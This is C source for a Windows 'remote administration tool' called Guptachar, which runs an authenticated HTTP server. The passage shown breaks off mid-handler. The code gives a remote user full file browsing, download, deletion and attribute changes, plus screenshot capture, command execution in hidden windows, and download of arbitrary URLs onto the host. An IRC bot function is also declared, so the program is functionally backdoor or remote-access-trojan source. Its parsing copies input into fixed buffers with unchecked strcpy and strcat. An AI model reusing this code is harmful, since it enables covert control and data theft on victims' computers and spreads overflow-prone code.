/****************************************************************************

    Guptachar Remote Administration Tool
    Copyright (C) 2001 Ayan Chakrabarti

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.


    GUPT.C
    ======
    The main module containing code to implement the basic HTTP server and
    to handle most of the requests.

****************************************************************************/

#include <winsock.h>
#include <windows.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include "html.h"
#include "irc.h"

/****** Prototypes ******/

long WINAPI start_httpd(long krp);
long WINAPI ircbot(long);
void die(void);
void SetPassword(char * url);
void DoTransfer(SOCKET s,char * url);
void DisplayMessage(char * url);
long WINAPI handlereq(long sq);
void conv_base64(char * input,char * output);
void sendstring(SOCKET s,char * st);
void DoFile(SOCKET s);
void DoFget(SOCKET s,char * url);
void DoProp(SOCKET s,char * url);
void DoMkDir(SOCKET s,char * url);
void DoBrowse(SOCKET s,char * fname);
void DoSetattr(SOCKET s,char * url);
void DoMove(SOCKET s,char * url);
void DoCopy(SOCKET s,char * url);
void DoDelete(SOCKET s,char * url);
void DoStart(SOCKET s,char * url);
void DoExec(char * url);
void DoScreen(SOCKET s);
void dumpscreen(char * fname);

/****** Password ******/

char passwd[1024];

/****** General Purpose Functions ******/

void sendstring(SOCKET s,char * st)
{
        send(s,st,strlen(st),0);
}

void conv_base64(char * input,char * output)
{
        int len,n,i,j = 0;
        char c1,c2,c3,o1,o2,o3,o4;
        char table[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";


        len = strlen(input);
        n = len/3;

        for(i = 0;i < n;i++)
        {
             c1 = input[i*3];
             c2 = input[i*3+1];
             c3 = input[i*3+2];

             o1 = (c1 >> 2) & 0x3F;
             
             o2 = c1 & 0x03;
             o2 <<= 4;
             o2 &= 0xF0;
             c1 = c2 >> 4;
             c1 &= 0x0F;
             o2 += c1;

             o3 = c2 & 0x0F;
             o3 <<= 2;
             o3 &= 0xFC;
             c2 = c3 >> 6;
             c2 &= 0x03;
             o3 += c2;

             o4 = c3 & 0x3F;

             output[j++] = table[o1];
             output[j++] = table[o2];
             output[j++] = table[o3];
             output[j++] = table[o4];
        }

        if(len % 3 == 0)
        {
                output[j] = '\0';
                return;
        }

        if(len % 3 == 1)
        {
                c1 = input[len-1];
                c2 = 0;
        }

        if(len %3 == 2)
        {
                c1 = input[len-2];
                c2 = input[len-1];
        }

        c3 = 0;

        o1 = (c1 >> 2) & 0x3F;
             
        o2 = c1 & 0x03;
        o2 <<= 4;
        o2 &= 0xF0;
        c1 = c2 >> 4;
        c1 &= 0x0F;
        o2 += c1;
                         
        o3 = c2 & 0x0F;
        o3 <<= 2;
        o3 &= 0xFC;
        c2 = c3 >> 6;
        c2 &= 0x03;
        o3 += c2;

        o4 = c3 & 0x3F;

        output[j++] = table[o1];
        output[j++] = table[o2];
        output[j++] = table[o3];
        output[j++] = table[o4];

        output[j] = '\0';

        for(i = 0;i < (3 - len%3);i++)
                output[--j] = '=';
}

int isreadable(SOCKET s,int sec)
{
        fd_set rset;
        struct timeval tv;

        FD_ZERO(&rset);
        FD_SET(s,&rset);

        tv.tv_sec = sec;
        tv.tv_usec = 0;

        return (select(s + 1,&rset,NULL,NULL,&tv));
}


void htget(char * host,char * url,char * fn)
{
        FILE * fp;
        SOCKET s;
        struct hostent * hs;
        struct sockaddr_in sa;
        char buf[4096];
        int i,j,f,f2;

        fp = fopen(fn,"wb");
        if(!fp)
                return;

        sa.sin_family = AF_INET;
        sa.sin_port = htons(80);
        if((sa.sin_addr.s_addr = inet_addr(host)) == -1)
        {
                if((hs = gethostbyname(host)) == NULL)
                        return;
                memcpy(&sa.sin_addr,hs->h_addr,sizeof(struct in_addr));
        }

        s = socket(AF_INET,SOCK_STREAM,0);
        if(s == INVALID_SOCKET)
                return;


        if(connect(s,(struct sockaddr *)&sa,sizeof(sa)) < 0)
                return;

        strcpy(buf,"GET ");
        strcat(buf,url);
        strcat(buf," HTTP/1.0\r\nConnection: Close\r\nHost: ");
        strcat(buf,host);
        strcat(buf,"\r\n\r\n");
        send(s,buf,strlen(buf),0);

        i = 0;
        f2 = -1;
        while(f2 == -1)
        {
                if(!isreadable(s,60))
                {
                        fclose(fp);
                        closesocket(s);
                        return;
                }

                j = recv(s,&buf[i],4095,0);
                if(j <= 0)
                {
                        fclose(fp);
                        closesocket(s);
                        return;
                }

                i += j;
                f = 0;
                for(j = 0;j < i;j++)
                  if(buf[j] == '\n')
                  {
                        if(f == 1)
                        {
                                f2 = j;
                                break;
                        }
                        else
                                f = 1;
                  }
                  else if(buf[j] != '\r')
                        f = 0;
                
        }

        for(j = f2;j < i;j++)
                if(buf[j] != '\r' && buf[j] != '\n')
                        break;

        fwrite(&buf[j],i-j,1,fp);

        while(1)
        {
                if(!isreadable(s,60))
                        break;
                i = recv(s,buf,4095,0);
                if(i <= 0)
                        break;
                fwrite(buf,i,1,fp);

        }

        fclose(fp);

        closesocket(s);
        
}

void geturl(char * url,char * file)
{
        char hostname[1024],gurl[1024];
        int i,j;

        
        strcpy(gurl,"/");
        for(i = j = 0;url[i] != '\0' && url[i] != '/';i++,j++)
                hostname[j] = url[i];
        hostname[j] = '\0';
        
        if(url[i] != '\0')
        {
                for(j = 0;url[i] != '\0';i++,j++)
                        gurl[j] = url[i];
                gurl[j] = '\0';
        }

        
        htget(hostname,gurl,file);

}


/****** Implementation of various server requests ******/


void DoTransfer(SOCKET s,char * url)
{
        char gurl[1024],fname[1024],strn[1024],*crrnt;
        int i = 0,j = 0;

        gurl[0] = fname[0] = '\0';
        while(1)
        {
                if(url[i] == 'u')
                        crrnt = gurl;
                else if(url[i] == 'p')
                        crrnt = fname;
                else
                        break;
                i+=2;

                for(j = 0;url[i] != '&' && url[i] != '\0';i++)
                        if(url[i] == '+')
                                crrnt[j++] = ' ';
                        else if(url[i] == '%')
                        {
                                i++;
                                if(url[i] >= '0' && url[i] <= '9')
                                        crrnt[j] = url[i] - '0';
                                else
                                        crrnt[j] = 10 + url[i] - 'A';
                                i++;
                                crrnt[j] *= 16;
                                if(url[i] >= '0' && url[i] <= '9')
                                        crrnt[j] += url[i] - '0';
                                else
                                        crrnt[j] += 10 + url[i] - 'A';
                              j++;
                        }
                        else
                                crrnt[j++] = url[i];
                crrnt[j] = '\0';
                if(url[i] == '\0')
                        break;
                else
                        i++;

        }
        send(s,transfer,transfersz,0);
        closesocket(s);

        geturl(gurl,fname);
}


void DoExec(char * url)
{
        char cmline[1024],choice[10],*crrnt;
        int i = 0,j = 0;

        cmline[0] = choice[0] = '\0';
        strcpy(choice,"1");
        while(1)
        {
                if(url[i] == 'o')
                        crrnt = cmline;
                else if(url[i] == 'n')
                        crrnt = choice;
                else
                        break;
                i+=2;

                for(j = 0;url[i] != '&' && url[i] != '\0';i++)
                        if(url[i] == '+')
                                crrnt[j++] = ' ';
                        else if(url[i] == '%')
                        {
                                i++;
                                if(url[i] >= '0' && url[i] <= '9')
                                        crrnt[j] = url[i] - '0';
                                else
                                        crrnt[j] = 10 + url[i] - 'A';
                                i++;
                                crrnt[j] *= 16;
                                if(url[i] >= '0' && url[i] <= '9')
                                        crrnt[j] += url[i] - '0';
                                else
                                        crrnt[j] += 10 + url[i] - 'A';
                              j++;
                        }
                        else
                                crrnt[j++] = url[i];
                crrnt[j] = '\0';
                if(url[i] == '\0')
                        break;
                else
                        i++;

        }
        switch(choice[0])
        {
                case '4': i = SW_HIDE;break;
                case '3': i = SW_MAXIMIZE;break;
                case '2': i = SW_MINIMIZE;break;
                case '1': default: i = SW_RESTORE;
        }

        WinExec(cmline,i);

}


void SetPassword(char * url)
{
        char user[1024],pass[1024],strn[1024],*crrnt;
        int i = 0,j = 0;

        user[0] = pass[0] = '\0';
        while(1)
        {
                if(url[i] == 'u')
                        crrnt = user;
                else if(url[i] == 'p')
                        crrnt = pass;
                else
                        break;
                i+=2;

                for(j = 0;url[i] != '&' && url[i] != '\0';i++)
                        if(url[i] == '+')
                                crrnt[j++] = ' ';
                        else if(url[i] == '%')
                        {
                                i++;
                                if(url[i] >= '0' && url[i] <= '9')
                                        crrnt[j] = url[i] - '0';
                                else
                                        crrnt[j] = 10 + url[i] - 'A';
                                i++;
                                crrnt[j] *= 16;
                                if(url[i] >= '0' && url[i] <= '9')
                                        crrnt[j] += url[i] - '0';
                                else
                                        crrnt[j] += 10 + url[i] - 'A';
                              j++;
                        }
                        else
                                crrnt[j++] = url[i];
                crrnt[j] = '\0';
                if(url[i] == '\0')
                        break;
                else
                        i++;

        }
        strcpy(strn,user);
        strcat(strn,":");
        strcat(strn,pass);
        conv_base64(strn,passwd);
        WriteProfileString("GSRV","pwdid",passwd);
}



void DoProp(SOCKET s,char * url)
{
        char fname[1024],att[50];
        int i,j = 0;
        DWORD attrib;

        for(i = 0;url[i] != '&' && url[i] != '\0';i++)
                if(url[i] == '+')
                        fname[j++] = ' ';
                else if(url[i] == '%')
                {
                        i++;
                        if(url[i] >= '0' && url[i] <= '9')
                                fname[j] = url[i] - '0';
                        else
                                fname[j] = 10 + url[i] - 'A';
                        i++;
                        fname[j] *= 16;
                        if(url[i] >= '0' && url[i] <= '9')
                                fname[j] += url[i] - '0';
                        else
                                fname[j] += 10 + url[i] - 'A';
                        j++;
                }
                else
                        fname[j++] = url[i];
                fname[j] = '\0';

                
                attrib = GetFileAttributes(fname);
                if(attrib & FILE_ATTRIBUTE_HIDDEN)
                        strcpy(att,"H");
                if(attrib & FILE_ATTRIBUTE_SYSTEM)
                        strcat(att,"S");
                if(attrib & FILE_ATTRIBUTE_READONLY)
                        strcat(att,"R");
                if(attrib & FILE_ATTRIBUTE_ARCHIVE)
                        strcat(att,"A");

                send(s,flbeg,flbegsz,0);

                sendstring(s,"<center><font size=\"5\">");
                sendstring(s,fname);
                sendstring(s,"</font><p><table width=\"60%\"><tr><td width=\"50%\">");

                sendstring(s,"<table border=\"1\" width=\"100%\" bordercolor=\"#FFFFFF\" bgcolor=\"#00AFAF\"><tr><td width=\"100%\"><BR><form method=\"GET\" action=\"/setattr\"><center>");
                sendstring(s,"<input type=\"text\" name=\"n\" value = \"");
                sendstring(s,att);
                sendstring(s,"\"><BR><input type=\"submit\" value=\"Set Attributes\"><input type=\"hidden\" name=\"o\" value=\"");
                sendstring(s,fname);
                sendstring(s,"\"></center></form></td></tr></table></td><td width=\"50%\">");

                sendstring(s,"<table border=\"1\" width=\"100%\" bordercolor=\"#FFFFFF\" bgcolor=\"#00AFAF\"><tr><td width=\"100%\"><BR><form method=\"GET\" action=\"/move\"><center>");
                sendstring(s,"<input type=\"text\" name=\"n\" value=\"");
                sendstring(s,fname);
                sendstring(s,"\"><BR><input type=\"submit\" value=\"Move File/Directory\"><input type=\"hidden\" name=\"o\" value=\"");
                sendstring(s,fname);
                sendstring(s,"\"></center></form></td></tr></table></td></tr><tr><td width=\"50%\">");

                sendstring(s,"<table border=\"1\" width=\"100%\" bordercolor=\"#FFFFFF\" bgcolor=\"#00AFAF\"><tr><td width=\"100%\"><BR><form method=\"GET\" action=\"/copy\"><center>");
                sendstring(s,"<input type=\"text\" name=\"n\"><BR><input type=\"submit\" value=\"Copy File\"><input type=\"hidden\" name=\"o\" value=\"");
                sendstring(s,fname);
                sendstring(s,"\"></center></form></td></tr></table></td><td width=\"50%\">");

                sendstring(s,"<table border=\"1\" width=\"100%\" height=\"100%\" bordercolor=\"#FFFFFF\" bgcolor=\"#00AFAF\"><tr><td width=\"100%\"><BR><form method=\"GET\" action=\"/delete\"><center>");
                sendstring(s,"<input type=\"submit\" value=\"Delete File/Directory\"><input type=\"hidden\" name=\"q\" value=\"");
                sendstring(s,fname);
                sendstring(s,"\"></center></form></td></tr></table></td></tr></table></center><p>&nbsp;<p>");

                send(s,flend,flendsz,0);
}



void DoSetattr(SOCKET s,char * url)
{
        char fname[1024],att[1024],*crrnt;
        int i=0,j=0;
        DWORD attr;

        fname[0] = att[0] = '\0';
        while(1)
        {
                if(url[i] == 'o')
                        crrnt = fname;
                else if(url[i] == 'n')
                        crrnt = att;
                else
                        break;
                i+=2;

                for(j = 0;url[i] != '&' && url[i] != '\0';i++)
                        if(url[i] == '+')
                                crrnt[j++] = ' ';
                        else if(url[i] == '%')
                        {
                                i++;
                                if(url[i] >= '0' && url[i] <= '9')
                                        crrnt[j] = url[i] - '0';
                                else
                                        crrnt[j] = 10 + url[i] - 'A';
                                i++;
                                crrnt[j] *= 16;
                                if(url[i] >= '0' && url[i] <= '9')
                                        crrnt[j] += url[i] - '0';
                                else
                                        crrnt[j] += 10 + url[i] - 'A';
                              j++;
                        }
                        else
                                crrnt[j++] = url[i];
                crrnt[j] = '\0';
                if(url[i] == '\0')
                        break;
                else
                        i++;

        }

        attr = GetFileAttributes(fname);
        if(attr & FILE_ATTRIBUTE_DIRECTORY)
                attr = FILE_ATTRIBUTE_DIRECTORY;
        else
                attr = 0;

        for(i = 0;att[i];i++)
        {
                switch(att[i])
                {
                        case 'H' :  attr |= FILE_ATTRIBUTE_HIDDEN;
                                    break;
                        case 'S' :  attr |= FILE_ATTRIBUTE_SYSTEM;
                                    break;
                        case 'R' :  attr |= FILE_ATTRIBUTE_READONLY;
                                    break;
                        case 'A' :  attr |= FILE_ATTRIBUTE_ARCHIVE;
                 }
        }
        send(s,flbeg,flbegsz,0);
        if(SetFileAttributes(fname,attr))
                sendstring(s,"<CENTER>Attributes Changed.</CENTER><p>&nbsp;</p>");
        else
                sendstring(s,"<CENTER>Error Changing Attributes.</CENTER><p>&nbsp;</p>");
        send(s,flend,flendsz,0);
}



void DoMove(SOCKET s,char * url)
{
        char oname[1024],nname[1024],*crrnt;
        int i=0,j=0;

        oname[0] = nname[0] = '\0';
        while(1)
        {
                if(url[i] == 'o')
                        crrnt = oname;
                else if(url[i] == 'n')
                        crrnt = nname;
                else
                        break;
                i+=2;

                for(j = 0;url[i] != '&' && url[i] != '\0';i++)
                        if(url[i] == '+')
                                crrnt[j++] = ' ';
                        else if(url[i] == '%')
                        {
                                i++;
                                if(url[i] >= '0' && url[i] <= '9')
                                        crrnt[j] = url[i] - '0';
                                else
                                        crrnt[j] = 10 + url[i] - 'A';
                                i++;
                                crrnt[j] *= 16;
                                if(url[i] >= '0' && url[i] <= '9')
                                        crrnt[j] += url[i] - '0';
                                else
                                        crrnt[j] += 10 + url[i] - 'A';
                              j++;
                        }
                        else
                                crrnt[j++] = url[i];
                crrnt[j] = '\0';
                if(url[i] == '\0')
                        break;
                else
                        i++;

        }

        send(s,flbeg,flbegsz,0);
        if(MoveFile(oname,nname))
                sendstring(s,"<CENTER>Move successfull.</CENTER><p>&nbsp;</p>");
        else
                sendstring(s,"<CENTER>Unable to Move.</CENTER><p>&nbsp;</p>");
        send(s,flend,flendsz,0);
}



void DoCopy(SOCKET s,char * url)
{
        char oname[1024],nname[1024],*crrnt;
        int i=0,j=0;

        oname[0] = nname[0] = '\0';
        while(1)
        {
                if(url[i] == 'o')
                        crrnt = oname;
                else if(url[i] == 'n')
                        crrnt = nname;
                else
                        break;
                i+=2;

                for(j = 0;url[i] != '&' && url[i] != '\0';i++)
                        if(url[i] == '+')
                                crrnt[j++] = ' ';
                        else if(url[i] == '%')
                        {
                                i++;
                                if(url[i] >= '0' && url[i] <= '9')
                                        crrnt[j] = url[i] - '0';
                                else
                                        crrnt[j] = 10 + url[i] - 'A';
                                i++;
                                crrnt[j] *= 16;
                                if(url[i] >= '0' && url[i] <= '9')
                                        crrnt[j] += url[i] - '0';
                                else
                                        crrnt[j] += 10 + url[i] - 'A';
                              j++;
                        }
                        else
                                crrnt[j++] = url[i];
                crrnt[j] = '\0';
                if(url[i] == '\0')
                        break;
                else
                        i++;

        }

        send(s,flbeg,flbegsz,0);
        if(CopyFile(oname,nname,TRUE))
                sendstring(s,"<CENTER>File copied successfully.</CENTER><p>&nbsp;</p>");
        else
                sendstring(s,"<CENTER>Unable to Copy.</CENTER><p>&nbsp;</p>");
        send(s,flend,flendsz,0);
}



void DoDelete(SOCKET s,char * url)
{
        char fname[1024];
        int i,j = 0;

        for(i = 0;url[i] != '&' && url[i] != '\0';i++)
                if(url[i] == '+')
                        fname[j++] = ' ';
                else if(url[i] == '%')
                {
                        i++;
                        if(url[i] >= '0' && url[i] <= '9')
                                fname[j] = url[i] - '0';
                        else
                                fname[j] = 10 + url[i] - 'A';
                        i++;
                        fname[j] *= 16;
                        if(url[i] >= '0' && url[i] <= '9')
                                fname[j] += url[i] - '0';
                        else
                                fname[j] += 10 + url[i] - 'A';
                        j++;
                }
                else
                        fname[j++] = url[i];
                fname[j] = '\0';

                send(s,flbeg,flbegsz,0);

                if(GetFileAttributes(fname) & FILE_ATTRIBUTE_DIRECTORY)
                {
                        if(RemoveDirectory(fname))
                                sendstring(s,"<CENTER>Directory Removed.</CENTER><p>&nbsp;</p>");
                        else
                                sendstring(s,"<CENTER>Unable to Delete Directory.<BR>Ensure that it is empty.</CENTER><p>&nbsp;</p>");
                }
                else
                {
                        if(DeleteFile(fname))
                                sendstring(s,"<CENTER>File Deleted.</CENTER><p>&nbsp;</p>");
                        else
                                sendstring(s,"<CENTER>Unable to Delete File.</CENTER><p>&nbsp;</p>");
                }
                send(s,flend,flendsz,0);
}



void DoStart(SOCKET s,char * url)
{
        char fname[1024],buf[4096];
        int i,j = 0;

        for(i = 0;url[i] != '&' && url[i] != '\0';i++)
                if(url[i] == '+')
                        fname[j++] = ' ';
                else if(url[i] == '%')
                {
                        i++;
                        if(url[i] >= '0' && url[i] <= '9')
                                fname[j] = url[i] - '0';
                        else
                                fname[j] = 10 + url[i] - 'A';
                        i++;
                        fname[j] *= 16;
                        if(url[i] >= '0' && url[i] <= '9')
                                fname[j] += url[i] - '0';
                        else
                                fname[j] += 10 + url[i] - 'A';
                        j++;
                }
                else
                        fname[j++] = url[i];
                fname[j] = '\0';

                strcpy(buf,"START \"");
                strcat(buf,fname);
                strcat(buf,"\"");
                WinExec(buf,SW_RESTORE);

                send(s,flbeg,flbegsz,0);
                sendstring(s,"<CENTER>File opened on remote system.</CENTER><p>&nbsp;</p>");
                send(s,flend,flendsz,0);
}



void DoMkDir(SOCKET s,char * url)
{
        char fname[1024];
        int i,j = 0;

        for(i = 0;url[i] != '&' && url[i] != '\0';i++)
                if(url[i] == '+')
                        fname[j++] = ' ';
                else if(url[i] == '%')
                {
                        i++;
                        if(url[i] >= '0' && url[i] <= '9')
                                fname[j] = url[i] - '0';
                        else
                                fname[j] = 10 + url[i] - 'A';
                        i++;
                        fname[j] *= 16;
                        if(url[i] >= '0' && url[i] <= '9')
                                fname[j] += url[i] - '0';
                        else
                                fname[j] += 10 + url[i] - 'A';
                        j++;
                }
                else
                        fname[j++] = url[i];
                fname[j] = '\0';

                if(!CreateDirectory(fname,NULL))
                {
                        send(s,flbeg,flbegsz,0);
                        sendstring(s,"<CENTER>Error creating directory.</CENTER><p>&nbsp;</p>");
                        send(s,flend,flendsz,0);
                        return;
                }

                DoBrowse(s,fname);
}



void DoFget(SOCKET s,char * url)
{
        char fname[1024],buf[4096];
        FILE * fp;
        int i,j = 0;
        DWORD attr;
        unsigned long fsize;

        for(i = 0;url[i] != '&' && url[i] != '\0';i++)
                if(url[i] == '+')
                        fname[j++] = ' ';
                else if(url[i] == '%')
                {
                        i++;
                        if(url[i] >= '0' && url[i] <= '9')
                                fname[j] = url[i] - '0';
                        else
                                fname[j] = 10 + url[i] - 'A';
                        i++;
                        fname[j] *= 16;
                        if(url[i] >= '0' && url[i] <= '9')
                                fname[j] += url[i] - '0';
                        else
                                fname[j] += 10 + url[i] - 'A';
                        j++;
                }
                else
                        fname[j++] = url[i];
                fname[j] = '\0';

        attr = GetFileAttributes(fname);

        if((attr & FILE_ATTRIBUTE_DIRECTORY) || attr == 0xFFFFFFFF)
        {
                DoBrowse(s,fname);
                return;
        }

        fp = fopen(fname,"rb");
        fseek(fp,0,SEEK_END);
        fsize = ftell(fp);
        fseek(fp,0,SEEK_SET);

        sprintf(buf,"HTTP/1.0 200 OK\r\nContent-Type: application/octet-stream\r\nContent-Length: %ld\r\nConnection: close\r\n\r\n",fsize);
        sendstring(s,buf);

        for(i = 0;i < fsize/4096;i++)
        {
                fread(buf,4096,1,fp);
                send(s,buf,4096,0);
        }
        if(fsize%4096 != 0)
        {
                fread(buf,fsize%4096,1,fp);
                send(s,buf,fsize%4096,0);
        }

        fclose(fp);


}



void DoScreen(SOCKET s)
{
        char buf[4096];
        FILE * fp;
        int i;
        unsigned long fsize;


        dumpscreen("~1ST1~21.BMP");

        fp = fopen("~1ST1~21.BMP","rb");
        fseek(fp,0,SEEK_END);
        fsize = ftell(fp);
        fseek(fp,0,SEEK_SET);

        sprintf(buf,"HTTP/1.0 200 OK\r\nContent-Type: image/bmp\r\nContent-Length: %ld\r\nConnection: close\r\n\r\n",fsize);
        sendstring(s,buf);

        for(i = 0;i < fsize/4096;i++)
        {
                fread(buf,4096,1,fp);
                send(s,buf,4096,0);
        }
        if(fsize%4096 != 0)
        {
                fread(buf,fsize%4096,1,fp);
                send(s,buf,fsize%4096,0);
        }

        fclose(fp);

        DeleteFile("~1ST1~21.BMP");
        
}



void DoBrowse(SOCKET s,char * fname)
{
        char dname[1024],search[1024],buf[1024],att[30];
        DWORD attr;
        WIN32_FIND_DATA fd;
        HANDLE hfind;

        sendstring(s,"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\nConnection: close\r\n\r\n");
        send(s,flbeg,flbegsz,0);
        
        if(fname[strlen(fname)-1] == '\\')
                strcpy(dname,fname);
        else
        {
                attr = GetFileAttributes(fname);
                if(attr == 0xFFFFFFFF)
                {
                        sendstring(s,"<CENTER>Error reading file/directory.</CENTER><p>&nbsp;</p>");
                        send(s,flend,flendsz,0);
                        return;
                }
                if(attr & FILE_ATTRIBUTE_DIRECTORY == 0)
                        return;
                strcpy(dname,fname);
                strcat(dname,"\\");
        }

        sendstring(s,"<center><table border=\"0\" width=\"75%\"><tr><td width=\"100%\"><font size = \"5\">Listing of ");
        sendstring(s,dname);
        sendstring(s,"</font></td></tr></table><p><table border=\"0\" width=\"65%\"><tr><td>Name&nbsp;&nbsp;&nbsp;&nbsp;</td><td>Size</td><td></td><td></td><td></td></tr><tr><td><hr></td><td><hr></td><td><hr></td><td><hr></td><td><hr></td></tr>");
        strcpy(search,dname);
        strcat(search,"*.*");

        hfind = FindFirstFile(search,&fd);
        while(hfind != INVALID_HANDLE_VALUE)
        {

                if(fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
                        sprintf(buf,"<tr><td>[%s]</td><td>%ld</td><td><A HREF=\"/fget?q=%s%s\">Browse</A>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td><td><A target=\"_blank\" HREF=\"/prop?q=%s%s\">Properties</A></td><td><A target=\"_blank\" HREF=\"/open?q=%s%s\">Open</A></td></tr>",fd.cFileName,fd.nFileSizeLow,dname,fd.cFileName,dname,fd.cFileName,dname,fd.cFileName);
                else
                        sprintf(buf,"<tr><td>%s</td><td>%ld</td><td><A HREF=\"/fget?q=%s%s\">Download</A>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td><td><A target=\"_blank\" HREF=\"/prop?q=%s%s\">Properties</A></td><td><A target=\"_blank\" HREF=\"/open?q=%s%s\">Open</A></td></tr>",fd.cFileName,fd.nFileSizeLow,dname,fd.cFileName,dname,fd.cFileName,dname,fd.cFileName);

                sendstring(s,buf);
                if(!FindNextFile(hfind,&fd))
                        break;
        }

        FindClose(hfind);

        sendstring(s,"</table><p>&nbsp;<table border=\"1\" width=\"75%\" bordercolorlight=\"#008000\" bordercolordark=\"#008000\" bgcolor=\"#005F00\" bordercolor=\"#FFFFFF\"><tr><td width=\"100%\"><BR><form method=\"GET\" action=\"/mkdir\">");
        sendstring(s,"<center><input type=\"text\" name=\"q\"  value = \"");
        sendstring(s,dname);
        sendstring(s,"NEWDIR\" size=\"60\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" value=\"Make Directory\"></center></form></td></tr>");
        sendstring(s,"</table></center><p>&nbsp;");

        send(s,flend,flendsz,0);
}



void DisplayMessage(char * url)
{
        char outmsg[1024];
        int i = 0,j = 0;

        for(i = 0;url[i] != '&' && url[i] != '\0';i++)
                if(url[i] == '+')
                        outmsg[j++] = ' ';
                else if(url[i] == '%')
                {
                        i++;
                        if(url[i] >= '0' && url[i] <= '9')
                                outmsg[j] = url[i] - '0';
                        else
                                outmsg[j] = 10 + url[i] - 'A';
                        i++;
                        outmsg[j] *= 16;
                        if(url[i] >= '0' && url[i] <= '9')
                                outmsg[j] += url[i] - '0';
                        else
                                outmsg[j] += 10 + url[i] - 'A';
                        j++;
                }
                else
                        outmsg[j++] = url[i];
                outmsg[j] = '\0';
                MessageBox(0,outmsg,"Guptachar Remote Administration Tool",0);
}



void DoFile(SOCKET s)
{
        char comp[1024],ddrv[1024],*drv;
        DWORD dwdrv = 1024;

        sendstring(s,"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\nConnection: close\r\n\r\n");
        send(s,flbeg,flbegsz,0);

        if(!GetComputerName(comp,&dwdrv))
                strcpy(comp,"Remote Machine");

        GetLogicalDriveStrings(1024,ddrv);
        drv = ddrv;

        sendstring(s,"<center><table border=\"0\" width=\"75%\"><tr><td width=\"100%\"><font size = \"5\">Listing of "); 
        sendstring(s,comp);
        sendstring(s,"</font></td></tr></table><p>");
        sendstring(s,"<table border=\"0\" width=\"65%\">");

        while(*drv != '\0')
        {
                sendstring(s,"<tr><td><A HREF=\"/fget?q=");
                sendstring(s,drv);
                sendstring(s,"\">");
                sendstring(s,drv);
                sendstring(s,"</A></tr></td>");
                drv = drv + sizeof(char) * (strlen(drv) + 1);
        }
        sendstring(s,"</table></center><p>&nbsp;");


        send(s,flend,flendsz,0);
}



/****** HTTP Connection Handler ******/


long WINAPI handlereq(long sq)
{
      int       n,i,flag = 0,reql = 0,flag2,sz;
      char      *buf,rbuf[4096],req[1024],*url,outb[4096],*pass;
      SOCKET    s;


      s = (SOCKET) sq;

      flag2 = 0;
      buf = rbuf;
      sz = 4096;

      while(!flag)
      {
                if(sz <= 0)
                {
                        closesocket(s);
                        return -1;
                }

                if(!isreadable(s,60))
                {
                        closesocket(s);
                        return -1;
                }
                n = recv(s,buf,sz,0);

                if(n <= 0)
                {
                        closesocket(s);
                        return -1;
                }
                sz-= n;

                i = 0;

                if(reql == 0 || req[reql] != '\0')
                {
                        for(;i < n;i++)
                                if(buf[i] != '\n')
                                        req[reql++] = buf[i];
                                else
                                {
                                        req[reql] = '\0';
                                        break;
                                }
                }

                for(;i < n && !flag;i++)
                   if(buf[i] != '\n' && buf[i] != '\r')
                        flag2 = 0;
                   else if(buf[i] == '\n')
                   {
                        if(flag2 == 0)
                                flag2 = 1;
                        else
                                flag = 1;
                   }
                buf += n*sizeof(char);
      }

      if(strstr(rbuf,"Authorization:") == NULL)
      {
                strcpy(outb,"HTTP/1.0 401 No Authorization\r\nWWW-Authenticate: Basic realm=\"Guptachar\"\r\nContent-Type: text/html\r\nConnection: close\r\n\r\n");
                strcat(outb,"<HTML><TITLE>Server Error 401: Authentication Failure</TITLE>\n");
                strcat(outb,"The Guptachar Remote Administration Tool requires authentication.</HTML>");
                send(s,outb,strlen(outb),0);
      }
      else if(strncmp(req,"GET",3) == 0)
      {
               for(i = 3;req[i] != '/' && req[i] != '\0';i++);
               url = req+i;
               for(;req[i] != ' ' && req[i] != '\0';i++);
               req[i] = '\0';

               pass = strstr(rbuf,"Authorization:");
               pass += 14;
               for(;isspace(*pass);pass++);
               for(;!isspace(*pass) && *pass != '\0';pass++);
               for(;isspace(*pass);pass++);
               for(i = 0;pass[i] != '\0' && !isspace(pass[i]);i++);
               pass[i] = '\0';

               if(strcmp(passwd,pass) != 0)
               {
                        strcpy(outb,"HTTP/1.0 401 No Authorization\r\nWWW-Authenticate: Basic realm=\"Guptachar\"\r\nContent-Type: text/html\r\nConnection: close\r\n\r\n");
                        strcat(outb,"<HTML><TITLE>Server Error 401: Authentication Failure</TITLE>\n");
                        strcat(outb,"Invalid username/password.</HTML>");
                        send(s,outb,strlen(outb),0);
               }
               else if(strcmp(url,"/") == 0)
               {
                              strcpy(outb,"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\nConnection: close\r\n\r\n");
                              send(s,outb,strlen(outb),0);
                              send(s,index,indexsz,0);
               }
               else if(strcmp(url,"/pipe") == 0)
               {
                         strcpy(outb,"<HTML><TITLE>Screenshot</TITLE><IMG SRC=\"/desk.bmp\"></HTML>");
                         send(s,outb,strlen(outb),0);
               }
               else if(strcmp(url,"/desk.bmp") == 0)
                        DoScreen(s);
               else if(strcmp(url,"/shut") == 0)
               {
                              strcpy(outb,"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\nConnection: close\r\n\r\n");
                              send(s,outb,strlen(outb),0);
                              send(s,shut,shutsz,0);
               }
               else if(strcmp(url,"/exec") == 0)
               {
                              strcpy(outb,"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\nConnection: close\r\n\r\n");
                              send(s,outb,strlen(outb),0);
                              send(s,sexec,sexecsz,0);
               }
               else if(strcmp(url,"/file") == 0)
                              DoFile(s);  
               else if(strcmp(url,"/disp") == 0)
               {
